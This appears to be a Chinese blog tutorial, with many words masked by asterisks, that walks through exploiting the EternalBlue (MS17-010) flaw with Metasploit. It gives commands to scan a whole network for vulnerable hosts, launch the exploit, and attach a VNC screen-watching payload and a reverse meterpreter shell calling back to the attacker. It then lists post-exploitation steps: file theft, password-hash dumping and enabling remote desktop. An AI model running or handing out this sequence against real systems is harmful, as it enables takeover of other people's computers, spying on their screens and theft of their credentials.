永恆之藍其實是利用了微軟的MS17-010漏洞。MS17-010是Windows系統一個底層服務的漏洞,通過這個漏洞可以影響445端口。***就是通過在網絡上掃描開放的445端口,然後把***病毒植入被***電腦。
這裏使用MSF 實現 “永恆之藍”的快速***,就是利用Metasploit中針對ms17-101漏洞的***載荷進行***獲取主機控制權限。我這裏簡單的記錄下整個***利用所需要的工具準備、利用過程以及後***的一些簡單內容。
本次***測試在kali中進行
首先 掃描局域網存在漏洞主機
msfconsole #啓動msf
use auxiliary/scanner/smb/smb_ms17_010 #加載ms_17_010模塊
show options #查看配置
(這裏可以看到RHOSTS後邊的required爲yes 所以必須設置,爲no的則不必須)
set RHOSTS 192.168.0.0/16 #設置掃描網段 RHOSTS(RHOSTS表示多個ip)
(這裏可以看到THREADS爲1 速度太慢 我們設置成100)
set THREADS 100 #設置線程爲100
run #啓動
接下來就是等待掃描結果看看哪個可以利用
其次 進行***(另一個shell窗口中進行)
msfconsole #啓動msf
search ms17_010 #搜索******模塊
(這裏看到搜索到******模塊2個,但是他們是一樣的)
use exploit/windows/smb/ms17_010_eternalblue #加載******模塊
show options #展示***載荷
(這裏看到需要設置RHOST 將上邊掃描到的可利用主機ip 設置爲RHOST)
set RHOST [ip] #RHOST 僅一個ip
接下來是設置***載荷payload,不同的payload有不同的功能
#設置***載荷①
set payload windows/x64/vncinject/bind_tcp #用於屏幕監控
exploit
然後你就可以看到他的屏幕了
#設置***載荷②
set payload windows/x64/meterpreter/reverse_tcp
show options #查看所需配置
set LHOST [本機ip] #配置參數
exploit #進行***
**********此***載荷下有很多命令,不一一細說**************
********** 只說幾個簡單的 ***************
********** 截屏 screenshot ***************
********** 屏幕監控 run vnc (若對方電腦上有安全軟件會不穩定或者失敗)
********** 進入對方cmd shell *****************
********** 進入cmd之後命令可就多了 你懂得 **************
********** 下載文件 download filepath **************
********** 上傳文件 upload 本機path 對方path *************
********** 獲得密碼hash hashdump ******************
********** 開啓3389遠程桌面 run post/windows/manage/enable_rdp
***********************************************************
更多 更詳細的內容請參照 http://helloeveryone.blog.51cto.com/6171143/1112040/